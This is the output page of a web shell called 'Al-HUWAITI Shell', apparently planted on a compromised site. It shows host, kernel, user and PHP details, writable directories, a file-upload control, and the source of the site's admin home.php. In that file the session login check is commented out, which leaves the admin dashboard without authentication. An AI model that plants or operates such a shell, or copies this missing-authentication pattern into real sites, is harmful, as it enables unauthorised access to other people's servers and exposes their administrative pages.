Al-HUWAITI Shell
Al-huwaiti


Server : LiteSpeed
System : Linux in-mum-web1949.main-hosting.eu 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
User : u595547767 ( 595547767)
PHP Version : 7.4.33
Disable Function : NONE
Directory :  /home/u595547767/domains/nilasevasamithi.com/public_html/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/u595547767/domains/nilasevasamithi.com/public_html/admin/home.php
<?php
  include_once('connect.php');
    session_start(); 
    
    // Check if the user is logged in
    // if (!isset($_SESSION['loggedin']) || $_SESSION['loggedin'] !== true) {
    //      echo "<script type='text/javascript'>window.location.href = 'index.php';</script>"; // Redirect to login page
    //     exit();
    // }
    
    
    include_once('head.php');
    

?>

  <main id="main" class="main">

    <div class="pagetitle">
      <h1>Dashboard</h1>
      <nav>
        <ol class="breadcrumb">
          <li class="breadcrumb-item"><a href="index.html">Home</a></li>
          <li class="breadcrumb-item active">Dashboard</li>
        </ol>
      </nav>
    </div><!-- End Page Title -->

    <section class="section dashboard" style="background-image: url('assets/img/bg-featured.jpg');background-size: cover;height: 600px;">
      <div class="row">
        <h1 class="text-center text-white pt-20">NILA SEVA SAMITHI </h1>
        <!-- Left side columns -->
        <div class="col-lg-12">
          <div class="row">
              <div class="card">
                <img src="">
              </div>
          </div>
        </div><!-- End Left side columns -->

      </div>
    </section>

  </main><!-- End #main -->

  <?php
        include_once('footer.php');
      
   ?>

Al-HUWAITI Shell